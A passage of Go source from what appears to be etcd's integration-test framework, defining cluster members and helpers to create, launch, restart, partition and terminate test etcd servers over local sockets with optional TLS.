l, err := transport.NewUnixListener(addr)
if err != nil {
t.Fatal(err)
}
return l
}
type Member struct {
config.ServerConfig
UniqNumber int
MemberNumber int
PeerListeners, ClientListeners []net.Listener
GrpcListener net.Listener
// PeerTLSInfo enables peer TLS when set
PeerTLSInfo *transport.TLSInfo
// ClientTLSInfo enables client TLS when set
ClientTLSInfo *transport.TLSInfo
DialOptions []grpc.DialOption
RaftHandler *testutil.PauseableHandler
Server *etcdserver.EtcdServer
ServerClosers []func()
GrpcServerOpts []grpc.ServerOption
GrpcServer *grpc.Server
GrpcServerPeer *grpc.Server
GrpcURL string
GrpcBridge *bridge
// ServerClient is a clientv3 that directly calls the etcdserver.
ServerClient *clientv3.Client
// Client is a clientv3 that communicates via socket, either UNIX or TCP.
Client *clientv3.Client
KeepDataDirTerminate bool
ClientMaxCallSendMsgSize int
ClientMaxCallRecvMsgSize int
UseIP bool
UseBridge bool
UseTCP bool
IsLearner bool
Closed bool
GrpcServerRecorder *grpc_testing.GrpcRecorder
}
func (m *Member) GRPCURL() string { return m.GrpcURL }
type MemberConfig struct {
Name string
UniqNumber int64
MemberNumber int
PeerTLS *transport.TLSInfo
ClientTLS *transport.TLSInfo
AuthToken string
QuotaBackendBytes int64
MaxTxnOps uint
MaxRequestBytes uint
SnapshotCount uint64
SnapshotCatchUpEntries uint64
GrpcKeepAliveMinTime time.Duration
GrpcKeepAliveInterval time.Duration
GrpcKeepAliveTimeout time.Duration
ClientMaxCallSendMsgSize int
ClientMaxCallRecvMsgSize int
UseIP bool
UseBridge bool
UseTCP bool
EnableLeaseCheckpoint bool
LeaseCheckpointInterval time.Duration
LeaseCheckpointPersist bool
WatchProgressNotifyInterval time.Duration
ExperimentalMaxLearners int
StrictReconfigCheck bool
}
// MustNewMember return an inited member with the given name. If peerTLS is
// set, it will use https scheme to communicate between peers.
func MustNewMember(t testutil.TB, mcfg MemberConfig) *Member {
var err error
m := &Member{
MemberNumber: mcfg.MemberNumber,
UniqNumber: int(atomic.AddInt32(&LocalListenCount, 1)),
}
peerScheme := SchemeFromTLSInfo(mcfg.PeerTLS)
clientScheme := SchemeFromTLSInfo(mcfg.ClientTLS)
pln := newLocalListener(t)
m.PeerListeners = []net.Listener{pln}
m.PeerURLs, err = types.NewURLs([]string{peerScheme + "://" + pln.Addr().String()})
if err != nil {
t.Fatal(err)
}
m.PeerTLSInfo = mcfg.PeerTLS
cln := newLocalListener(t)
m.ClientListeners = []net.Listener{cln}
m.ClientURLs, err = types.NewURLs([]string{clientScheme + "://" + cln.Addr().String()})
if err != nil {
t.Fatal(err)
}
m.ClientTLSInfo = mcfg.ClientTLS
m.Name = mcfg.Name
m.DataDir, err = os.MkdirTemp(t.TempDir(), "etcd")
if err != nil {
t.Fatal(err)
}
clusterStr := fmt.Sprintf("%s=%s://%s", mcfg.Name, peerScheme, pln.Addr().String())
m.InitialPeerURLsMap, err = types.NewURLsMap(clusterStr)
if err != nil {
t.Fatal(err)
}
m.InitialClusterToken = ClusterName
m.NewCluster = true
m.BootstrapTimeout = 10 * time.Millisecond
if m.PeerTLSInfo != nil {
m.ServerConfig.PeerTLSInfo = *m.PeerTLSInfo
}
m.ElectionTicks = ElectionTicks
m.InitialElectionTickAdvance = true
m.TickMs = uint(TickDuration / time.Millisecond)
m.QuotaBackendBytes = mcfg.QuotaBackendBytes
m.MaxTxnOps = mcfg.MaxTxnOps
if m.MaxTxnOps == 0 {
m.MaxTxnOps = embed.DefaultMaxTxnOps
}
m.MaxRequestBytes = mcfg.MaxRequestBytes
if m.MaxRequestBytes == 0 {
m.MaxRequestBytes = embed.DefaultMaxRequestBytes
}
m.SnapshotCount = etcdserver.DefaultSnapshotCount
if mcfg.SnapshotCount != 0 {
m.SnapshotCount = mcfg.SnapshotCount
}
m.SnapshotCatchUpEntries = etcdserver.DefaultSnapshotCatchUpEntries
if mcfg.SnapshotCatchUpEntries != 0 {
m.SnapshotCatchUpEntries = mcfg.SnapshotCatchUpEntries
}
// for the purpose of integration testing, simple token is enough
m.AuthToken = "simple"
if mcfg.AuthToken != "" {
m.AuthToken = mcfg.AuthToken
}
m.BcryptCost = uint(bcrypt.MinCost) // use min bcrypt cost to speedy up integration testing
m.GrpcServerOpts = []grpc.ServerOption{}
if mcfg.GrpcKeepAliveMinTime > time.Duration(0) {
m.GrpcServerOpts = append(m.GrpcServerOpts, grpc.KeepaliveEnforcementPolicy(keepalive.EnforcementPolicy{
MinTime: mcfg.GrpcKeepAliveMinTime,
PermitWithoutStream: false,
}))
}
if mcfg.GrpcKeepAliveInterval > time.Duration(0) &&
mcfg.GrpcKeepAliveTimeout > time.Duration(0) {
m.GrpcServerOpts = append(m.GrpcServerOpts, grpc.KeepaliveParams(keepalive.ServerParameters{
Time: mcfg.GrpcKeepAliveInterval,
Timeout: mcfg.GrpcKeepAliveTimeout,
}))
}
m.ClientMaxCallSendMsgSize = mcfg.ClientMaxCallSendMsgSize
m.ClientMaxCallRecvMsgSize = mcfg.ClientMaxCallRecvMsgSize
m.UseIP = mcfg.UseIP
m.UseBridge = mcfg.UseBridge
m.UseTCP = mcfg.UseTCP
m.EnableLeaseCheckpoint = mcfg.EnableLeaseCheckpoint
m.LeaseCheckpointInterval = mcfg.LeaseCheckpointInterval
m.LeaseCheckpointPersist = mcfg.LeaseCheckpointPersist
m.WatchProgressNotifyInterval = mcfg.WatchProgressNotifyInterval
m.InitialCorruptCheck = true
m.WarningApplyDuration = embed.DefaultWarningApplyDuration
m.WarningUnaryRequestDuration = embed.DefaultWarningUnaryRequestDuration
m.ExperimentalMaxLearners = membership.DefaultMaxLearners
if mcfg.ExperimentalMaxLearners != 0 {
m.ExperimentalMaxLearners = mcfg.ExperimentalMaxLearners
}
m.V2Deprecation = config.V2_DEPR_DEFAULT
m.GrpcServerRecorder = &grpc_testing.GrpcRecorder{}
m.Logger = memberLogger(t, mcfg.Name)
m.StrictReconfigCheck = mcfg.StrictReconfigCheck
if err := m.listenGRPC(); err != nil {
t.Fatal(err)
}
t.Cleanup(func() {
// if we didn't cleanup the logger, the consecutive test
// might reuse this (t).
raft.ResetDefaultLogger()
})
return m
}
func memberLogger(t testutil.TB, name string) *zap.Logger {
level := zapcore.InfoLevel
if os.Getenv("CLUSTER_DEBUG") != "" {
level = zapcore.DebugLevel
}
options := zaptest.WrapOptions(zap.Fields(zap.String("member", name)))
return zaptest.NewLogger(t, zaptest.Level(level), options).Named(name)
}
// listenGRPC starts a grpc server over a unix domain socket on the member
func (m *Member) listenGRPC() error {
// prefix with localhost so cert has right domain
network, host, port := m.grpcAddr()
grpcAddr := host + ":" + port
m.Logger.Info("LISTEN GRPC", zap.String("grpcAddr", grpcAddr), zap.String("m.Name", m.Name))
grpcListener, err := net.Listen(network, grpcAddr)
if err != nil {
return fmt.Errorf("listen failed on grpc socket %s (%v)", grpcAddr, err)
}
m.GrpcURL = fmt.Sprintf("%s://%s", m.clientScheme(), grpcAddr)
if m.UseBridge {
_, err = m.addBridge()
if err != nil {
grpcListener.Close()
return err
}
}
m.GrpcListener = grpcListener
return nil
}
func (m *Member) clientScheme() string {
switch {
case m.UseTCP && m.ClientTLSInfo != nil:
return "https"
case m.UseTCP && m.ClientTLSInfo == nil:
return "http"
case !m.UseTCP && m.ClientTLSInfo != nil:
return "unixs"
case !m.UseTCP && m.ClientTLSInfo == nil:
return "unix"
}
m.Logger.Panic("Failed to determine client schema")
return ""
}
func (m *Member) addBridge() (*bridge, error) {
network, host, port := m.grpcAddr()
grpcAddr := host + ":" + port
bridgeAddr := grpcAddr + "0"
m.Logger.Info("LISTEN BRIDGE", zap.String("grpc-address", bridgeAddr), zap.String("member", m.Name))
bridgeListener, err := transport.NewUnixListener(bridgeAddr)
if err != nil {
return nil, fmt.Errorf("listen failed on bridge socket %s (%v)", bridgeAddr, err)
}
m.GrpcBridge, err = newBridge(dialer{network: network, addr: grpcAddr}, bridgeListener)
if err != nil {
bridgeListener.Close()
return nil, err
}
m.GrpcURL = m.clientScheme() + "://" + bridgeAddr
return m.GrpcBridge, nil
}
func (m *Member) Bridge() *bridge {
if !m.UseBridge {
m.Logger.Panic("Bridge not available. Please configure using bridge before creating Cluster.")
}
return m.GrpcBridge
}
func (m *Member) grpcAddr() (network, host, port string) {
// prefix with localhost so cert has right domain
host = "localhost"
if m.UseIP { // for IP-only TLS certs
host = "127.0.0.1"
}
network = "unix"
if m.UseTCP {
network = "tcp"
}
port = m.Name
if m.UseTCP {
port = fmt.Sprintf("%d", GrpcPortNumber(m.UniqNumber, m.MemberNumber))
}
return network, host, port
}
func GrpcPortNumber(uniqNumber, memberNumber int) int {
return BaseGRPCPort + uniqNumber*10 + memberNumber
}
type dialer struct {
network string
addr string
}
func (d dialer) Dial() (net.Conn, error) {
return net.Dial(d.network, d.addr)
}
func (m *Member) ElectionTimeout() time.Duration {
return time.Duration(m.Server.Cfg.ElectionTicks*int(m.Server.Cfg.TickMs)) * time.Millisecond
}
func (m *Member) ID() types.ID { return m.Server.ID() }
// NewClientV3 creates a new grpc client connection to the member
func NewClientV3(m *Member) (*clientv3.Client, error) {
if m.GrpcURL == "" {
return nil, fmt.Errorf("member not configured for grpc")
}
cfg := clientv3.Config{
Endpoints: []string{m.GrpcURL},
DialTimeout: 5 * time.Second,
DialOptions: []grpc.DialOption{grpc.WithBlock()},
MaxCallSendMsgSize: m.ClientMaxCallSendMsgSize,
MaxCallRecvMsgSize: m.ClientMaxCallRecvMsgSize,
Logger: m.Logger.Named("client"),
}
if m.ClientTLSInfo != nil {
tls, err := m.ClientTLSInfo.ClientConfig()
if err != nil {
return nil, err
}
cfg.TLS = tls
}
if m.DialOptions != nil {
cfg.DialOptions = append(cfg.DialOptions, m.DialOptions...)
}
return newClientV3(cfg)
}
// Clone returns a member with the same server configuration. The returned
// member will not set PeerListeners and ClientListeners.
func (m *Member) Clone(t testutil.TB) *Member {
mm := &Member{}
mm.ServerConfig = m.ServerConfig
var err error
clientURLStrs := m.ClientURLs.StringSlice()
mm.ClientURLs, err = types.NewURLs(clientURLStrs)
if err != nil {
// this should never fail
panic(err)
}
peerURLStrs := m.PeerURLs.StringSlice()
mm.PeerURLs, err = types.NewURLs(peerURLStrs)
if err != nil {
// this should never fail
panic(err)
}
clusterStr := m.InitialPeerURLsMap.String()
mm.InitialPeerURLsMap, err = types.NewURLsMap(clusterStr)
if err != nil {
// this should never fail
panic(err)
}
mm.InitialClusterToken = m.InitialClusterToken
mm.ElectionTicks = m.ElectionTicks
mm.PeerTLSInfo = m.PeerTLSInfo
mm.ClientTLSInfo = m.ClientTLSInfo
mm.Logger = memberLogger(t, mm.Name+"c")
return mm
}
// Launch starts a member based on ServerConfig, PeerListeners
// and ClientListeners.
func (m *Member) Launch() error {
m.Logger.Info(
"launching a member",
zap.String("name", m.Name),
zap.Strings("advertise-peer-urls", m.PeerURLs.StringSlice()),
zap.Strings("listen-client-urls", m.ClientURLs.StringSlice()),
zap.String("grpc-url", m.GrpcURL),
)
var err error
if m.Server, err = etcdserver.NewServer(m.ServerConfig); err != nil {
return fmt.Errorf("failed to initialize the etcd server: %v", err)
}
m.Server.SyncTicker = time.NewTicker(500 * time.Millisecond)
m.Server.Start()
var peerTLScfg *tls.Config
if m.PeerTLSInfo != nil && !m.PeerTLSInfo.Empty() {
if peerTLScfg, err = m.PeerTLSInfo.ServerConfig(); err != nil {
return err
}
}
if m.GrpcListener != nil {
var (
tlscfg *tls.Config
)
if m.ClientTLSInfo != nil && !m.ClientTLSInfo.Empty() {
tlscfg, err = m.ClientTLSInfo.ServerConfig()
if err != nil {
return err
}
}
m.GrpcServer = v3rpc.Server(m.Server, tlscfg, m.GrpcServerRecorder.UnaryInterceptor(), m.GrpcServerOpts...)
m.GrpcServerPeer = v3rpc.Server(m.Server, peerTLScfg, m.GrpcServerRecorder.UnaryInterceptor())
m.ServerClient = v3client.New(m.Server)
lockpb.RegisterLockServer(m.GrpcServer, v3lock.NewLockServer(m.ServerClient))
epb.RegisterElectionServer(m.GrpcServer, v3election.NewElectionServer(m.ServerClient))
go m.GrpcServer.Serve(m.GrpcListener)
}
m.RaftHandler = &testutil.PauseableHandler{Next: etcdhttp.NewPeerHandler(m.Logger, m.Server)}
h := (http.Handler)(m.RaftHandler)
if m.GrpcListener != nil {
h = http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
if r.ProtoMajor == 2 && strings.Contains(r.Header.Get("Content-Type"), "application/grpc") {
m.GrpcServerPeer.ServeHTTP(w, r)
} else {
m.RaftHandler.ServeHTTP(w, r)
}
})
}
for _, ln := range m.PeerListeners {
cm := cmux.New(ln)
// don't hang on matcher after closing listener
cm.SetReadTimeout(time.Second)
if m.GrpcServer != nil {
grpcl := cm.Match(cmux.HTTP2())
go m.GrpcServerPeer.Serve(grpcl)
}
// serve http1/http2 rafthttp/grpc
ll := cm.Match(cmux.Any())
if peerTLScfg != nil {
if ll, err = transport.NewTLSListener(ll, m.PeerTLSInfo); err != nil {
return err
}
}
hs := &httptest.Server{
Listener: ll,
Config: &http.Server{
Handler: h,
TLSConfig: peerTLScfg,
ErrorLog: log.New(io.Discard, "net/http", 0),
},
TLS: peerTLScfg,
}
hs.Start()
donec := make(chan struct{})
go func() {
defer close(donec)
cm.Serve()
}()
closer := func() {
ll.Close()
hs.CloseClientConnections()
hs.Close()
<-donec
}
m.ServerClosers = append(m.ServerClosers, closer)
}
for _, ln := range m.ClientListeners {
hs := &httptest.Server{
Listener: ln,
Config: &http.Server{
Handler: v2http.NewClientHandler(
m.Logger,
m.Server,
m.ServerConfig.ReqTimeout(),
),
ErrorLog: log.New(io.Discard, "net/http", 0),
},
}
if m.ClientTLSInfo == nil {
hs.Start()
} else {
info := m.ClientTLSInfo
hs.TLS, err = info.ServerConfig()
if err != nil {
return err
}
// baseConfig is called on initial TLS handshake start.
//
// Previously,
// 1. Server has non-empty (*tls.Config).Certificates on client hello
// 2. Server calls (*tls.Config).GetCertificate iff:
// - Server'Server (*tls.Config).Certificates is not empty, or
// - Client supplies SNI; non-empty (*tls.ClientHelloInfo).ServerName
//
// When (*tls.Config).Certificates is always populated on initial handshake,
// client is expected to provide a valid matching SNI to pass the TLS
// verification, thus trigger server (*tls.Config).GetCertificate to reload
// TLS assets. However, a cert whose SAN field does not include domain names
// but only IP addresses, has empty (*tls.ClientHelloInfo).ServerName, thus
// it was never able to trigger TLS reload on initial handshake; first
// ceritifcate object was being used, never being updated.
//
// Now, (*tls.Config).Certificates is created empty on initial TLS client
// handshake, in order to trigger (*tls.Config).GetCertificate and populate
// rest of the certificates on every new TLS connection, even when client
// SNI is empty (e.g. cert only includes IPs).
//
// This introduces another problem with "httptest.Server":
// when server initial certificates are empty, certificates
// are overwritten by Go'Server internal test certs, which have
// different SAN fields (e.g. example.com). To work around,
// re-overwrite (*tls.Config).Certificates before starting
// test server.
tlsCert, err := tlsutil.NewCert(info.CertFile, info.KeyFile, nil)
if err != nil {
return err
}
hs.TLS.Certificates = []tls.Certificate{*tlsCert}
hs.StartTLS()
}
closer := func() {
ln.Close()
hs.CloseClientConnections()
hs.Close()
}
m.ServerClosers = append(m.ServerClosers, closer)
}
if m.GrpcURL != "" && m.Client == nil {
m.Client, err = NewClientV3(m)
if err != nil {
return err
}
}
m.Logger.Info(
"launched a member",
zap.String("name", m.Name),
zap.Strings("advertise-peer-urls", m.PeerURLs.StringSlice()),
zap.Strings("listen-client-urls", m.ClientURLs.StringSlice()),
zap.String("grpc-url", m.GrpcURL),
)
return nil
}
func (m *Member) RecordedRequests() []grpc_testing.RequestInfo {
return m.GrpcServerRecorder.RecordedRequests()
}
func (m *Member) WaitOK(t testutil.TB) {
m.WaitStarted(t)
for m.Server.Leader() == 0 {
time.Sleep(TickDuration)
}
}
func (m *Member) WaitStarted(t testutil.TB) {
cc := MustNewHTTPClient(t, []string{m.URL()}, m.ClientTLSInfo)
kapi := client.NewKeysAPI(cc)
for {
ctx, cancel := context.WithTimeout(context.Background(), RequestTimeout)
_, err := kapi.Get(ctx, "/", nil)
if err != nil {
time.Sleep(TickDuration)
continue
}
cancel()
break
}
}
func WaitClientV3(t testutil.TB, kv clientv3.KV) {
timeout := time.Now().Add(RequestTimeout)
var err error
for time.Now().Before(timeout) {
ctx, cancel := context.WithTimeout(context.Background(), RequestTimeout)
_, err = kv.Get(ctx, "/")
cancel()
if err == nil {
return
}
time.Sleep(TickDuration)
}
if err != nil {
t.Fatalf("timed out waiting for client: %v", err)
}
}
func (m *Member) URL() string { return m.ClientURLs[0].String() }
func (m *Member) Pause() {
m.RaftHandler.Pause()
m.Server.PauseSending()
}
func (m *Member) Resume() {
m.RaftHandler.Resume()
m.Server.ResumeSending()
}
// Close stops the member'Server etcdserver and closes its connections
func (m *Member) Close() {
if m.GrpcBridge != nil {
m.GrpcBridge.Close()
m.GrpcBridge = nil
}
if m.ServerClient != nil {
m.ServerClient.Close()
m.ServerClient = nil
}
if m.GrpcServer != nil {
ch := make(chan struct{})
go func() {
defer close(ch)
// close listeners to stop accepting new connections,
// will block on any existing transports
m.GrpcServer.GracefulStop()
}()
// wait until all pending RPCs are finished
select {
case <-ch:
case <-time.After(2 * time.Second):
// took too long, manually close open transports
// e.g. watch streams
m.GrpcServer.Stop()
<-ch
}
m.GrpcServer = nil
m.GrpcServerPeer.GracefulStop()
m.GrpcServerPeer.Stop()
m.GrpcServerPeer = nil
}
if m.Server != nil {
m.Server.HardStop()
}
for _, f := range m.ServerClosers {
f()
}
if !m.Closed {
// Avoid verification of the same file multiple times
// (that might not exist any longer)
verify.MustVerifyIfEnabled(verify.Config{
Logger: m.Logger,
DataDir: m.DataDir,
ExactIndex: false,
})
}
m.Closed = true
}
// Stop stops the member, but the data dir of the member is preserved.
func (m *Member) Stop(_ testutil.TB) {
m.Logger.Info(
"stopping a member",
zap.String("name", m.Name),
zap.Strings("advertise-peer-urls", m.PeerURLs.StringSlice()),
zap.Strings("listen-client-urls", m.ClientURLs.StringSlice()),
zap.String("grpc-url", m.GrpcURL),
)
m.Close()
m.ServerClosers = nil
m.Logger.Info(
"stopped a member",
zap.String("name", m.Name),
zap.Strings("advertise-peer-urls", m.PeerURLs.StringSlice()),
zap.Strings("listen-client-urls", m.ClientURLs.StringSlice()),
zap.String("grpc-url", m.GrpcURL),
)
}
// CheckLeaderTransition waits for leader transition, returning the new leader ID.
func CheckLeaderTransition(m *Member, oldLead uint64) uint64 {
interval := time.Duration(m.Server.Cfg.TickMs) * time.Millisecond
for m.Server.Lead() == 0 || (m.Server.Lead() == oldLead) {
time.Sleep(interval)
}
return m.Server.Lead()
}
// StopNotify unblocks when a member stop completes
func (m *Member) StopNotify() <-chan struct{} {
return m.Server.StopNotify()
}
// Restart starts the member using the preserved data dir.
func (m *Member) Restart(t testutil.TB) error {
m.Logger.Info(
"restarting a member",
zap.String("name", m.Name),
zap.Strings("advertise-peer-urls", m.PeerURLs.StringSlice()),
zap.Strings("listen-client-urls", m.ClientURLs.StringSlice()),
zap.String("grpc-url", m.GrpcURL),
)
newPeerListeners := make([]net.Listener, 0)
for _, ln := range m.PeerListeners {
newPeerListeners = append(newPeerListeners, NewListenerWithAddr(t, ln.Addr().String()))
}
m.PeerListeners = newPeerListeners
newClientListeners := make([]net.Listener, 0)
for _, ln := range m.ClientListeners {
newClientListeners = append(newClientListeners, NewListenerWithAddr(t, ln.Addr().String()))
}
m.ClientListeners = newClientListeners
if m.GrpcListener != nil {
if err := m.listenGRPC(); err != nil {
t.Fatal(err)
}
}
err := m.Launch()
m.Logger.Info(
"restarted a member",
zap.String("name", m.Name),
zap.Strings("advertise-peer-urls", m.PeerURLs.StringSlice()),
zap.Strings("listen-client-urls", m.ClientURLs.StringSlice()),
zap.String("grpc-url", m.GrpcURL),
zap.Error(err),
)
return err
}
// Terminate stops the member and removes the data dir.
func (m *Member) Terminate(t testutil.TB) {
m.Logger.Info(
"terminating a member",
zap.String("name", m.Name),
zap.Strings("advertise-peer-urls", m.PeerURLs.StringSlice()),
zap.Strings("listen-client-urls", m.ClientURLs.StringSlice()),
zap.String("grpc-url", m.GrpcURL),
)
m.Close()
if !m.KeepDataDirTerminate {
if err := os.RemoveAll(m.ServerConfig.DataDir); err != nil {
t.Fatal(err)
}
}
m.Logger.Info(
"terminated a member",
zap.String("name", m.Name),
zap.Strings("advertise-peer-urls", m.PeerURLs.StringSlice()),
zap.Strings("listen-client-urls", m.ClientURLs.StringSlice()),
zap.String("grpc-url", m.GrpcURL),
)
}
// Metric gets the metric value for a member
func (m *Member) Metric(metricName string, expectLabels ...string) (string, error) {
cfgtls := transport.TLSInfo{}
tr, err := transport.NewTimeoutTransport(cfgtls, time.Second, time.Second, time.Second)
if err != nil {
return "", err
}
cli := &http.Client{Transport: tr}
resp, err := cli.Get(m.ClientURLs[0].String() + "/metrics")
if err != nil {
return "", err
}
defer resp.Body.Close()
b, rerr := io.ReadAll(resp.Body)
if rerr != nil {
return "", rerr
}
lines := strings.Split(string(b), "\n")
for _, l := range lines {
if !strings.HasPrefix(l, metricName) {
continue
}
ok := true
for _, lv := range expectLabels {
if !strings.Contains(l, lv) {
ok = false
break
}
}
if !ok {
continue
}
return strings.Split(l, " ")[1], nil
}
return "", nil
}
// InjectPartition drops connections from m to others, vice versa.
func (m *Member) InjectPartition(t testutil.TB, others ...*Member) {
for _, other := range others {
m.Server.CutPeer(other.Server.ID())
other.Server.CutPeer(m.Server.ID())
t.Logf("network partition injected between: %v <-> %v", m.Server.ID(), other.Server.ID())
}
}
// RecoverPartition recovers connections from m to others, vice versa.
func (m *Member) RecoverPartition(t testutil.TB, others ...*Member) {
for _, other := range others {
m.Server.MendPeer(other.Server.ID())
other.Server.MendPeer(m.Server.ID())
t.Logf("network partition between: %v <-> %v", m.Server.ID(), other.Server.ID())
}
}
func (m *Member) ReadyNotify() <-chan struct{} {
return m.Server.ReadyNotify()
}
func MustNewHTTPClient(t testutil.TB, eps []string, tls *transport.TLSInfo) client.Client {
cfgtls := transport.TLSInfo{}
if tls != nil {
cfgtls = *tls
}
cfg := client.Config{Transport: mustNewTransport(t, cfgtls), Endpoints: eps}
c, err := client.New(cfg)
if err != nil {
t.Fatal(err)
}
return c
}
func mustNewTransport(t testutil.TB, tlsInfo transport.TLSInfo) *http.Transport {
// tick in integration test is short, so 1s dial timeout could play well.
tr, err := transport.NewTimeoutTransport(tlsInfo, time.Second, rafthttp.ConnReadTimeout, rafthttp.ConnWriteTimeout)
if err != nil {
t.Fatal(err)
}
return tr
}
type SortableMemberSliceByPeerURLs []client.Member
func (p SortableMemberSliceByPeerURLs) Len() int { return len(p) }
func (p SortableMemberSliceByPeerURLs) Less(i, j int) bool {
return p[i].PeerURLs[0] < p[j].PeerURLs[0]
}
func (p SortableMemberSliceByPeerURLs) Swap(i, j int) { p[i], p[j] = p[j], p[i] }
// NewCluster returns a launched Cluster with a grpc client connection
// for each Cluster member.
func NewCluster(t testutil.TB, cfg *ClusterConfig) *Cluster {
t.Helper()
assertInTestContext(t)
testutil.SkipTestIfShortMode(t, "Cannot start etcd Cluster in --short tests")
c := &Cluster{Cfg: cfg}
ms := make([]*Member, cfg.Size)
for i := 0; i < cfg.Size; i++ {
ms[i] = c.mustNewMember(t)
}
c.Members = ms
if err := c.fillClusterForMembers(); err != nil {
t.Fatal(err)
}
c.Launch(t)
return c
}
func (c *Cluster) TakeClient(idx int) {
c.mu.Lock()
c.Members[idx].Client = nil
c.mu.Unlock()
}
func (c *Cluster) Terminate(t testutil.TB) {
c.mu.Lock()
if c.clusterClient != nil {
if err := c.clusterClient.Close(); err != nil {
t.Error(err)
}
}
c.mu.Unlock()
for _, m := range c.Members {
if m.Client != nil {
m.Client.Close()
}
}
var wg sync.WaitGroup
wg.Add(len(c.Members))
for _, m := range c.Members {
go func(mm *Member) {
defer wg.Done()
mm.Terminate(t)
}(m)
}
wg.Wait()
}
func (c *Cluster) RandClient() *clientv3.Client {
return c.Members[rand.Intn(len(c.Members))].Client
}
func (c *Cluster) Client(i int) *clientv3.Client {
return c.Members[i].Client
}
func (c *Cluster) ClusterClient() (client *clientv3.Client, err error) {
if c.clusterClient == nil {
endpoints := []string{}
for _, m := range c.Members {
endpoints = append(endpoints, m.GrpcURL)
}
cfg := clientv3.Config{
Endpoints: endpoints,
DialTimeout: 5 * time.Second,
DialOptions: []grpc.DialOption{grpc.WithBlock()},
}
c.clusterClient, err = newClientV3(cfg)
if err != nil {
return nil, err
}
}
return c.clusterClient, nil
}
// NewClientV3 creates a new grpc client connection to the member
func (c *Cluster) NewClientV3(memberIndex int) (*clientv3.Client, error) {
return NewClientV3(c.Members[memberIndex])
}
func makeClients(t testutil.TB, clus *Cluster, clients *[]*clientv3.Client, chooseMemberIndex func() int) func() *clientv3.Client {
var mu sync.Mutex
*clients = nil
return func() *clientv3.Client {
cli, err := clus.NewClientV3(chooseMemberIndex())
if err != nil {
t.Fatalf("cannot create client: %v", err)
}
mu.Lock()
*clients = append(*clients, cli)
mu.Unlock()
return cli
}
}
// MakeSingleNodeClients creates factory of clients that all connect to member 0.
// All the created clients are put on the 'clients' list. The factory is thread-safe.
func MakeSingleNodeClients(t testutil.TB, clus *Cluster, clients *[]*clientv3.Client) func() *clientv3.Client {
return makeClients(t, clus, clients, func() int { return 0 })
}
// MakeMultiNodeClients creates factory of clients that all connect to random members.
// All the created clients are put on the 'clients' list. The factory is thread-safe.
func MakeMultiNodeClients(t testutil.TB, clus *Cluster, clients *[]*clientv3.Client) func() *clientv3.Client {
return makeClients(t, clus, clients, func() int { return rand.Intn(len(clus.Members)) })
}
// CloseClients closes all the clients from the 'clients' list.
func CloseClients(t testutil.TB, clients []*clientv3.Client) {
for _, cli := range clients {
if err := cli.Close(); err != nil {
t.Fatal(err)
}
}
}
type GrpcAPI struct {
// Cluster is the Cluster API for the client'Server connection.
Cluster pb.ClusterClient
// KV is the keyvalue API for the client'Server connection.
KV pb.KVClient
// Lease is the lease API for the client'Server connection.
Lease pb.LeaseClient
// Watch is the watch API for the client'Server connection.
Watch pb.WatchClient
// Maintenance is the maintenance API for the client'Server connection.
Maintenance pb.MaintenanceClient
// Auth is the authentication API for the client'Server connection.
Auth pb.AuthClient
// Lock is the lock API for the client'Server connection.
Lock lockpb.LockClient
// Election is the election API for the client'Server connection.
Election epb.ElectionClient
}
// GetLearnerMembers returns the list of learner members in Cluster using MemberList API.
func (c *Cluster) GetLearnerMembers() ([]*pb.Member, error) {
cli := c.Client(0)
resp, err := cli.MemberList(context.Background())
if err != nil {
return nil, fmt.Errorf("failed to list member %v", err)
}
var learners []*pb.Member
for _, m := range resp.Members {
if m.IsLearner {
learners = append(learners, m)
}
}
return learners, nil
}
// AddAndLaunchLearnerMember creates a leaner member, adds it to Cluster
// via v3 MemberAdd API, and then launches the new member.
func (c *Cluster) AddAndLaunchLearnerMember(t testutil.TB) {
m := c.mustNewMember(t)
m.IsLearner = true
scheme := SchemeFromTLSInfo(c.Cfg.PeerTLS)
peerURLs := []string{scheme + "://" + m.PeerListeners[0].Addr().String()}
cli := c.Client(0)
_, err := cli.MemberAddAsLearner(context.Background(), peerURLs)
if err != nil {
t.Fatalf("failed to add learner member %v", err)
}
m.InitialPeerURLsMap = types.URLsMap{}
for _, mm := range c.Members {
m.InitialPeerURLsMap[mm.Name] = mm.PeerURLs
}
m.InitialPeerURLsMap[m.Name] = m.PeerURLs
m.NewCluster = false
if err := m.Launch(); err != nil {
t.Fatal(err)
}
c.Members = append(c.Members, m)
c.waitMembersMatch(t)
}
// getMembers returns a list of members in Cluster, in format of etcdserverpb.Member
func (c *Cluster) getMembers() []*pb.Member {
var mems []*pb.Member
for _, m := range c.Members {
mem := &pb.Member{
Name: m.Name,
PeerURLs: m.PeerURLs.StringSlice(),
ClientURLs: m.ClientURLs.StringSlice(),
IsLearner: m.IsLearner,
}
mems = append(mems, mem)
}
return mems
}
// waitMembersMatch waits until v3rpc MemberList returns the 'same' members info as the
// local 'c.Members', which is the local recording of members in the testing Cluster. With
// the exception that the local recording c.Members does not have info on Member.ID, which
// is generated when the member is been added to Cluster.
//
// Note:
// A successful match means the Member.clientURLs are matched. This means member has already
// finished publishing its server attributes to Cluster. Publishing attributes is a Cluster-wide
// write request (in v2 server). Therefore, at this point, any raft log entries prior to this
// would have already been applied.
//
// If a new member was added to an existing Cluster, at this point, it has finished publishing
// its own server attributes to the Cluster. And therefore by the same argument, it has already
// applied the raft log entries (especially those of type raftpb.ConfChangeType). At this point,
// the new member has the correct view of the Cluster configuration.
//
// Special note on learner member:
// Learner member is only added to a Cluster via v3rpc MemberAdd API (as of v3.4). When starting
// the learner member, its initial view of the Cluster created by peerURLs map does not have info
// on whether or not the new member itself is learner. But at this point, a successful match does
// indicate that the new learner member has applied the raftpb.ConfChangeAddLearnerNode entry
// which was used to add the learner itself to the Cluster, and therefore it has the correct info
// on learner.
func (c *Cluster) waitMembersMatch(t testutil.TB) {
wMembers := c.getMembers()
sort.Sort(SortableProtoMemberSliceByPeerURLs(wMembers))
cli := c.Client(0)
for {
resp, err := cli.MemberList(context.Background())
if err != nil {
t.Fatalf("failed to list member %v", err)
}
if len(resp.Members) != len(wMembers) {
continue
}
sort.Sort(SortableProtoMemberSliceByPeerURLs(resp.Members))
for _, m := range resp.Members {
m.ID = 0
}
if reflect.DeepEqual(resp.Members, wMembers) {
return
}
time.Sleep(TickDuration)
}
}
type SortableProtoMemberSliceByPeerURLs []*pb.Member
func (p SortableProtoMemberSliceByPeerURLs) Len() int { return len(p) }
func (p SortableProtoMemberSliceByPeerURLs) Less(i, j int) bool {
return p[i].PeerURLs[0] < p[j].PeerURLs[0]
}
func (p SortableProtoMemberSliceByPeerURLs) Swap(i, j int) { p[i], p[j] = p[j], p[i] }
